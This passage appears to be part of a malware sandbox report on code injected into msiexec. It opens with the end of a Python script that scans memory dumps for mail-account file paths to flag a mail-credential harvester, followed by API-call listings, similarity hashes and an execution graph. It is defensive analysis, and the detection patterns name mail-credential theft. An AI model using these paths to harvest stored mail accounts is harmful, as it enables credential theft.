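    for frag in MAIL_PATH_FRAGMENTS:
        for enc in ("utf-16le", "ascii"):
            pats.append((frag, enc, re.compile(re.escape(frag.encode(enc)))))
    return pats


def scan_dump(data: bytes, base: int = 0):
    """Return sorted [(virtual_address, encoding, fragment)] for every hit.

    `base` is the load address of the region (0x228E0000 for the dump
    named in the report) so the offsets line up with the IDA listing.
    """
    hits = []
    for frag, enc, pat in _patterns():
        for m in pat.finditer(data):
            hits.append((base + m.start(), enc, frag))
    hits.sort()
    return hits


def looks_like_mail_harvester(hits, minimum=3):
    """True when at least `minimum` distinct fragments appear in one
    encoding; a lone "\\Mail\\" in some unrelated buffer is not enough."""
    by_enc = {}
    for _, enc, frag in hits:
        by_enc.setdefault(enc, set()).add(frag)
    return any(len(frags) >= minimum for frags in by_enc.values())


# Constructed stand-in for a dump: filler around UTF-16LE, NUL-terminated
# copies of the fragments. This is sample input for the demonstration only.
SAMPLE_BASE = 0x228E0000
SAMPLE_DUMP = (
    b"\x00" * 0x40
    + "\\Accounts\\Account.rec0".encode("utf-16le") + b"\x00\x00"
    + b"\x90" * 0x10
    + "\\Data\\AccCfg\\Accounts.tdat".encode("utf-16le") + b"\x00\x00"
    + b"\xcc" * 0x20
    + "\\Mail\\".encode("utf-16le") + b"\x00\x00"
    + "\\Storage\\".encode("utf-16le") + b"\x00\x00"
    + b"\x00" * 0x40
)


def scan_file(path: str, base: int = 0):
    """Scan a dump file from disk, e.g. a downloaded .sdmp."""
    with open(path, "rb") as fh:
        return scan_dump(fh.read(), base)


if __name__ == "__main__":
    # Usage: python scan_mail_paths.py [dump.sdmp [base_hex]]
    if len(sys.argv) > 1:
        base = int(sys.argv[2], 16) if len(sys.argv) > 2 else 0
        found = scan_file(sys.argv[1], base)
    else:
        found = scan_dump(SAMPLE_DUMP, SAMPLE_BASE)
    for va, enc, frag in found:
        print(f"{va:08X} {enc:8} {frag}")
    print("mail harvester strings present:", looks_like_mail_harvester(found))
```

Run it against the report's 228E1000 dump with base 228E0000 to confirm the fragments sit in the same private executable region as the code that references them; if a hit turns up only in ANSI, the string table was built differently from what the wide-API listing suggests and the function is worth a second look in the disassembly.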
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,228E4AEA,?,?,228E4A8A,?,228F2238,0000000C,228E4BBD,00000000,00000000), ref: 228E4B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 228E4B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,228E4AEA,?,?,228E4A8A,?,228F2238,0000000C,228E4BBD,00000000,00000000,?,228E2082), ref: 228E4B8F
Strings
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 31271404e83aaeb48666966e4bd8b58036e3ecc67c01cfceae1856126833e27e
• Instruction ID: 54a58412a2afb60fe964222a6d09b810c81591ec88e566447b865f6aa49589f8
• Opcode Fuzzy Hash: 31271404e83aaeb48666966e4bd8b58036e3ecc67c01cfceae1856126833e27e
• Instruction Fuzzy Hash: DFF03C39A40208EFDB119F90C808F9EBFBDEF89355F004164F90FA6294EB35DA45CA91
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 228E715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 228E717F
  • Part of subcall function 228E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 228E5702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 228E71A5
• _free.LIBCMT ref: 228E71B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 228E71C7
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 653d91416fe31b523715c8e4d612472afa920e5afe9d1cc8cc8f1c1bb131fca9
• Instruction ID: a2ad9fca01bdabab5f4e838f84eebeb2c1fe0e4f1f8cbaef1cfac530e73e985e
• Opcode Fuzzy Hash: 653d91416fe31b523715c8e4d612472afa920e5afe9d1cc8cc8f1c1bb131fca9
• Instruction Fuzzy Hash: CD01F27A606315FF27110ABA5C8CDBB2A6DDEC3AA4714052DBF0EC7248EE65CC02C1B4
APIs
• GetLastError.KERNEL32(00000000,?,00000000,228E636D,228E5713,00000000,?,228E2249,?,?,228E1D66,00000000,?,?,00000000), ref: 228E5B7F
• _free.LIBCMT ref: 228E5BB4
• _free.LIBCMT ref: 228E5BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E5BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E5BF1
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 49c2ae16a9190e9026777fcccf11cd26f779cf49c75d95700c391a464b07c21c
• Instruction ID: 9584461630c1a475c75afe4bbbb67a3ff0a98102c1d01de25e0df45e8f8eff9e
• Opcode Fuzzy Hash: 49c2ae16a9190e9026777fcccf11cd26f779cf49c75d95700c391a464b07c21c
• Instruction Fuzzy Hash: 1C0128BE144701E792026E385D84E0F2BED9BD36B0B540525FE1FAA186FF6CC906C170
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,228E10DF,?,?,?,00000000), ref: 228E1E9A
• lstrcatW.KERNEL32(?,?,?,228E10DF,?,?,?,00000000), ref: 228E1EAC
• lstrlenW.KERNEL32(?,?,228E10DF,?,?,?,00000000), ref: 228E1EB3
• lstrlenW.KERNEL32(?,?,228E10DF,?,?,?,00000000), ref: 228E1EC8
• lstrcatW.KERNEL32(?,228E10DF,?,228E10DF,?,?,?,00000000), ref: 228E1ED3
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: 220bc2e5d89744dcbfdca965846cc972598d28f8d451170a4a5296ec27ef2c0b
• Instruction ID: a288c55cc3904178192b78493724aa16c697b799e4d7893e6c068c68acbdeee4
• Opcode Fuzzy Hash: 220bc2e5d89744dcbfdca965846cc972598d28f8d451170a4a5296ec27ef2c0b
• Instruction Fuzzy Hash: 14F08926140210FAD6253729AC85E7F777CEFC7B60F040419FA0D83190AB949D4692B5
APIs
• _free.LIBCMT ref: 228E91D0
  • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
  • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
• _free.LIBCMT ref: 228E91E2
• _free.LIBCMT ref: 228E91F4
• _free.LIBCMT ref: 228E9206
• _free.LIBCMT ref: 228E9218
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 0edebfabf402b39f6018bc33d39aae46b751724fb5175483706df134b1e35ef2
• Instruction ID: d1c5a3ccab01c0b1ff981e289a0f3c04d086ccbe0ee690ee3790b0fc4fa74e9d
• Opcode Fuzzy Hash: 0edebfabf402b39f6018bc33d39aae46b751724fb5175483706df134b1e35ef2
• Instruction Fuzzy Hash: 43F012B5954380D78630DF59DBC5C167BD9EB12754B900C15FA1FDB544CB7CF8908A50
APIs
• _free.LIBCMT ref: 228E536F
  • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
  • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
• _free.LIBCMT ref: 228E5381
• _free.LIBCMT ref: 228E5394
• _free.LIBCMT ref: 228E53A5
• _free.LIBCMT ref: 228E53B6
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 0a04a3b2eb8c332b91505517cc79849e5df2eea02ec33caf39dead53ea986dd4
• Instruction ID: 63d89676ac606a57b84cec989251f2b58c461556a229900524a7ed76b3d9d409
• Opcode Fuzzy Hash: 0a04a3b2eb8c332b91505517cc79849e5df2eea02ec33caf39dead53ea986dd4
• Instruction Fuzzy Hash: DCF03078895754DBC6115F289A81C093BF5F72AB543860906FE1B9B2D8D73DC4A5CB80
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 228E4C1D
• _free.LIBCMT ref: 228E4CE8
• _free.LIBCMT ref: 228E4CF2
Strings
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\System32\msiexec.exe
• API String ID: 2506810119-1382325751
• Opcode ID: 9661e2f1a423f74b9fc5171a19d24778743183b51f095a6d0b98a76940c4fc92
• Instruction ID: 50dd3906ca314b67f84d1d50539c4c527d39251d1667a117a0ba3496aef8eefb
• Opcode Fuzzy Hash: 9661e2f1a423f74b9fc5171a19d24778743183b51f095a6d0b98a76940c4fc92
• Instruction Fuzzy Hash: 06318079A40358EFEB11CF998980D9EBBFCEB9A310F104056F90E97241D675DA41CB60
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,228E6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 228E8731
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 228E87BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 228E87CC
• __freea.LIBCMT ref: 228E87D5
  • Part of subcall function 228E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 228E5702
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 91cc2eedfe3070f338a97cc46bb4d665dc715c539bbbe1b3bc981234951f5e07
• Instruction ID: 93df11712414f63167c90dc093ec98ae4ee4bfd0569463af32bd03eaeac80b71
• Opcode Fuzzy Hash: 91cc2eedfe3070f338a97cc46bb4d665dc715c539bbbe1b3bc981234951f5e07
• Instruction Fuzzy Hash: 1131CE76A0030AEBDF148F64CC81DAF7BA5EB42314F410168FD0EDA1A0EB35C994CB91
APIs
• GetModuleHandleA.KERNEL32(228EC7DD), ref: 228EC7E6
• GetModuleHandleA.KERNEL32(?,228EC7DD), ref: 228EC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 228EC860
  • Part of subcall function 228EC803: GetProcAddress.KERNEL32(00000000,228EC7F4), ref: 228EC804
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID:
• API String ID: 1646373207-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: bf61ee1a5436e60582d0f919e361ef858fe7b1d244305d81f5eb23ed1f2988c9
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 68012E18D45370F8AA1352780F01AAA6FD89B27664F101B96F37FC6193CAA0C602C3A6
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,228E1D66,00000000,00000000,?,228E5C88,228E1D66,00000000,00000000,00000000,?,228E5E85,00000006,FlsSetValue), ref: 228E5D13
• GetLastError.KERNEL32(?,228E5C88,228E1D66,00000000,00000000,00000000,?,228E5E85,00000006,FlsSetValue,228EE190,FlsSetValue,00000000,00000364,?,228E5BC8), ref: 228E5D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,228E5C88,228E1D66,00000000,00000000,00000000,?,228E5E85,00000006,FlsSetValue,228EE190,FlsSetValue,00000000), ref: 228E5D2D
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 6c098cfbeb071ab8f1554cf9e3a8a1a3bcd3054d80a3ea9895679187595f67b6
• Instruction ID: 75df52c82bf549dde040ee4848899ce240b4d7f6983733eb2c40dec335b29040
• Opcode Fuzzy Hash: 6c098cfbeb071ab8f1554cf9e3a8a1a3bcd3054d80a3ea9895679187595f67b6
• Instruction Fuzzy Hash: AA01883A752326EBD7115E689C48E4A77DCAF066B1B140A30FE1FDB184E728E505C6D0
APIs
• _free.LIBCMT ref: 228E655C
  • Part of subcall function 228E62BC: IsProcessorFeaturePresent.KERNEL32(00000017,228E62AB,00000000,?,?,?,?,00000016,?,?,228E62B8,00000000,00000000,00000000,00000000,00000000), ref: 228E62BE
  • Part of subcall function 228E62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 228E62E0
  • Part of subcall function 228E62BC: TerminateProcess.KERNEL32(00000000), ref: 228E62E7
Strings
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
• Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
• Instruction ID: e381c2553aa1e9159e6454e3bbc271167e13cb6248a83f263647b23aed04bde5
• Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
• Instruction Fuzzy Hash: 18518179E00329DFDB04CFA8C980AADBBB5EF59314F248169E95DE7306E635DA01CB50
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
• Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction ID: b6fada5f239db185fbc37014afa539a2da38f9d473a44e41c5896b613ccbe06e
• Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction Fuzzy Hash: 7411C4B5A00348AECB15CFAC9841BEEFBFCAF1A704F104056E54AE7212E6749A02C765
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 228E2903
  • Part of subcall function 228E35D2: RaiseException.KERNEL32(?,?,?,228E2925,00000000,00000000,00000000,?,?,?,?,?,228E2925,?,228F21B8), ref: 228E3632
• __CxxThrowException@8.LIBVCRUNTIME ref: 228E2920
Strings
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 9cd324896126359d67b4872f21147dfaada7e8fbbc4d019b4730e4e5d65bae04
• Instruction ID: 795deb59f619bd7c2b68dfb761801c45087753de7b5a98ae64dcd770d7f7d876
• Opcode Fuzzy Hash: 9cd324896126359d67b4872f21147dfaada7e8fbbc4d019b4730e4e5d65bae04
• Instruction Fuzzy Hash: B6F0A43C90030DF78B00A6A8EC44D69B76C5B27750F904274BA2F96198FBF1EA65C5C2

Execution Graph

Execution Coverage: 5.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 73
                                                                                                        execution_graph 37676 4466f4 37695 446904 37676->37695 37678 446700 GetModuleHandleA 37681 446710 __set_app_type __p__fmode __p__commode 37678->37681 37680 4467a4 37682 4467ac __setusermatherr 37680->37682 37683 4467b8 37680->37683 37681->37680 37682->37683 37696 4468f0 _controlfp 37683->37696 37685 4467bd _initterm __wgetmainargs _initterm 37686 44681e GetStartupInfoW 37685->37686 37687 446810 37685->37687 37689 446866 GetModuleHandleA 37686->37689 37697 41276d 37689->37697 37693 446896 exit 37694 44689d _cexit 37693->37694 37694->37687 37695->37678 37696->37685 37698 41277d 37697->37698 37740 4044a4 LoadLibraryW 37698->37740 37700 412785 37731 412789 37700->37731 37748 414b81 37700->37748 37703 4127c8 37754 412465 memset ??2@YAPAXI 37703->37754 37705 4127ea 37766 40ac21 37705->37766 37710 412813 37784 40dd07 memset 37710->37784 37711 412827 37789 40db69 memset 37711->37789 37715 412822 37811 4125b6 ??3@YAXPAX DeleteObject 37715->37811 37716 40ada2 _wcsicmp 37717 41283d 37716->37717 37717->37715 37720 412863 CoInitialize 37717->37720 37794 41268e 37717->37794 37719 412966 37812 40b1ab free free 37719->37812 37810 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37720->37810 37724 41296f 37813 40b633 37724->37813 37726 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37732 412957 CoUninitialize 37726->37732 37737 4128ca 37726->37737 37731->37693 37731->37694 37732->37715 37733 4128d0 TranslateAcceleratorW 37734 412941 GetMessageW 37733->37734 37733->37737 37734->37732 37734->37733 37735 412909 IsDialogMessageW 37735->37734 37735->37737 37736 4128fd IsDialogMessageW 37736->37734 37736->37735 37737->37733 37737->37735 37737->37736 37738 41292b TranslateMessage DispatchMessageW 37737->37738 37739 41291f IsDialogMessageW 37737->37739 37738->37734 37739->37734 37739->37738 37741 4044cf GetProcAddress 37740->37741 
37745 4044f7 37740->37745 37742 4044e8 FreeLibrary 37741->37742 37743 4044df 37741->37743 37744 4044f3 37742->37744 37742->37745 37743->37742 37744->37745 37746 404507 MessageBoxW 37745->37746 37747 40451e 37745->37747 37746->37700 37747->37700 37749 414b8a 37748->37749 37750 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37748->37750 37817 40a804 memset 37749->37817 37750->37703 37753 414b9e GetProcAddress 37753->37750 37756 4124e0 37754->37756 37755 412505 ??2@YAPAXI 37757 41251c 37755->37757 37760 412521 37755->37760 37756->37755 37839 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37757->37839 37828 444722 37760->37828 37765 41259b wcscpy 37765->37705 37844 40b1ab free free 37766->37844 37768 40ad76 37845 40aa04 37768->37845 37771 40ad4b 37771->37768 37868 40a9ce 37771->37868 37772 40a9ce malloc memcpy free free 37778 40ac5c 37772->37778 37774 40ace7 free 37774->37778 37778->37768 37778->37771 37778->37772 37778->37774 37848 40a8d0 37778->37848 37860 4099f4 37778->37860 37779 40a8d0 7 API calls 37779->37768 37780 40ada2 37781 40adaa 37780->37781 37782 40adc9 37780->37782 37781->37782 37783 40adb3 _wcsicmp 37781->37783 37782->37710 37782->37711 37783->37781 37783->37782 37873 40dce0 37784->37873 37786 40dd3a GetModuleHandleW 37878 40dba7 37786->37878 37790 40dce0 3 API calls 37789->37790 37791 40db99 37790->37791 37950 40dae1 37791->37950 37964 402f3a 37794->37964 37796 412766 37796->37715 37796->37720 37797 4126d3 _wcsicmp 37798 4126a8 37797->37798 37798->37796 37798->37797 37800 41270a 37798->37800 37998 4125f8 7 API calls 37798->37998 37800->37796 37967 411ac5 37800->37967 37810->37726 37811->37719 37812->37724 37814 40b640 37813->37814 37815 40b639 free 37813->37815 37816 40b1ab free free 37814->37816 37815->37814 37816->37731 37818 40a83b GetSystemDirectoryW 37817->37818 37819 40a84c wcscpy 37817->37819 37818->37819 37824 409719 wcslen 37819->37824 37822 40a881 LoadLibraryW 37823 40a886 37822->37823 37823->37750 37823->37753 37825 409724 
37824->37825 37826 409739 wcscat LoadLibraryW 37824->37826 37825->37826 37827 40972c wcscat 37825->37827 37826->37822 37826->37823 37827->37826 37829 444732 37828->37829 37830 444728 DeleteObject 37828->37830 37840 409cc3 37829->37840 37830->37829 37832 412551 37833 4010f9 37832->37833 37834 401130 37833->37834 37835 401134 GetModuleHandleW LoadIconW 37834->37835 37836 401107 wcsncat 37834->37836 37837 40a7be 37835->37837 37836->37834 37838 40a7d2 37837->37838 37838->37765 37838->37838 37839->37760 37843 409bfd memset wcscpy 37840->37843 37842 409cdb CreateFontIndirectW 37842->37832 37843->37842 37844->37778 37846 40aa14 37845->37846 37847 40aa0a free 37845->37847 37846->37780 37847->37846 37849 40a8eb 37848->37849 37850 40a8df wcslen 37848->37850 37851 40a906 free 37849->37851 37852 40a90f 37849->37852 37850->37849 37853 40a919 37851->37853 37854 4099f4 3 API calls 37852->37854 37855 40a932 37853->37855 37856 40a929 free 37853->37856 37854->37853 37858 4099f4 3 API calls 37855->37858 37857 40a93e memcpy 37856->37857 37857->37778 37859 40a93d 37858->37859 37859->37857 37861 409a41 37860->37861 37862 4099fb malloc 37860->37862 37861->37778 37864 409a37 37862->37864 37865 409a1c 37862->37865 37864->37778 37866 409a30 free 37865->37866 37867 409a20 memcpy 37865->37867 37866->37864 37867->37866 37869 40a9e7 37868->37869 37870 40a9dc free 37868->37870 37872 4099f4 3 API calls 37869->37872 37871 40a9f2 37870->37871 37871->37779 37872->37871 37897 409bca GetModuleFileNameW 37873->37897 37875 40dce6 wcsrchr 37876 40dcf5 37875->37876 37877 40dcf9 wcscat 37875->37877 37876->37877 37877->37786 37898 44db70 37878->37898 37882 40dbfd 37901 4447d9 37882->37901 37885 40dc34 wcscpy wcscpy 37927 40d6f5 37885->37927 37886 40dc1f wcscpy 37886->37885 37889 40d6f5 3 API calls 37890 40dc73 37889->37890 37891 40d6f5 3 API calls 37890->37891 37892 40dc89 37891->37892 37893 40d6f5 3 API calls 37892->37893 37894 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37893->37894 37933 40da80 
37894->37933 37897->37875 37899 40dbb4 memset memset 37898->37899 37900 409bca GetModuleFileNameW 37899->37900 37900->37882 37903 4447f4 37901->37903 37902 40dc1b 37902->37885 37902->37886 37903->37902 37904 444807 ??2@YAPAXI 37903->37904 37905 44481f 37904->37905 37906 444873 _snwprintf 37905->37906 37907 4448ab wcscpy 37905->37907 37940 44474a 8 API calls 37906->37940 37909 4448bb 37907->37909 37941 44474a 8 API calls 37909->37941 37910 4448a7 37910->37907 37910->37909 37912 4448cd 37942 44474a 8 API calls 37912->37942 37914 4448e2 37943 44474a 8 API calls 37914->37943 37916 4448f7 37944 44474a 8 API calls 37916->37944 37918 44490c 37945 44474a 8 API calls 37918->37945 37920 444921 37946 44474a 8 API calls 37920->37946 37922 444936 37947 44474a 8 API calls 37922->37947 37924 44494b 37948 44474a 8 API calls 37924->37948 37926 444960 ??3@YAXPAX 37926->37902 37928 44db70 37927->37928 37929 40d702 memset GetPrivateProfileStringW 37928->37929 37930 40d752 37929->37930 37931 40d75c WritePrivateProfileStringW 37929->37931 37930->37931 37932 40d758 37930->37932 37931->37932 37932->37889 37934 44db70 37933->37934 37935 40da8d memset 37934->37935 37936 40daac LoadStringW 37935->37936 37937 40dac6 37936->37937 37937->37936 37939 40dade 37937->37939 37949 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37937->37949 37939->37715 37940->37910 37941->37912 37942->37914 37943->37916 37944->37918 37945->37920 37946->37922 37947->37924 37948->37926 37949->37937 37960 409b98 GetFileAttributesW 37950->37960 37952 40daea 37953 40daef wcscpy wcscpy GetPrivateProfileIntW 37952->37953 37959 40db63 37952->37959 37961 40d65d GetPrivateProfileStringW 37953->37961 37955 40db3e 37962 40d65d GetPrivateProfileStringW 37955->37962 37957 40db4f 37963 40d65d GetPrivateProfileStringW 37957->37963 37959->37716 37960->37952 37961->37955 37962->37957 37963->37959 37999 40eaff 37964->37999 37968 411ae2 memset 37967->37968 37969 411b8f 37967->37969 38040 409bca 
GetModuleFileNameW 37968->38040 37981 411a8b 37969->37981 37971 411b0a wcsrchr 37972 411b22 wcscat 37971->37972 37973 411b1f 37971->37973 38041 414770 wcscpy wcscpy wcscpy CloseHandle 37972->38041 37973->37972 37975 411b67 38042 402afb 37975->38042 37979 411b7f 38098 40ea13 SendMessageW memset SendMessageW 37979->38098 37982 402afb 27 API calls 37981->37982 37983 411ac0 37982->37983 37984 4110dc 37983->37984 37985 41113e 37984->37985 37990 4110f0 37984->37990 38123 40969c LoadCursorW SetCursor 37985->38123 37987 411143 38124 4032b4 37987->38124 38142 444a54 37987->38142 37988 4110f7 _wcsicmp 37988->37990 37989 411157 37991 40ada2 _wcsicmp 37989->37991 37990->37985 37990->37988 38145 410c46 10 API calls 37990->38145 37994 411167 37991->37994 37992 4111af 37994->37992 37995 4111a6 qsort 37994->37995 37995->37992 37998->37798 38000 40eb10 37999->38000 38013 40e8e0 38000->38013 38003 40eb6c memcpy memcpy 38004 40ebe1 38003->38004 38005 40ebb7 38003->38005 38004->38003 38006 40ebf2 ??2@YAPAXI ??2@YAPAXI 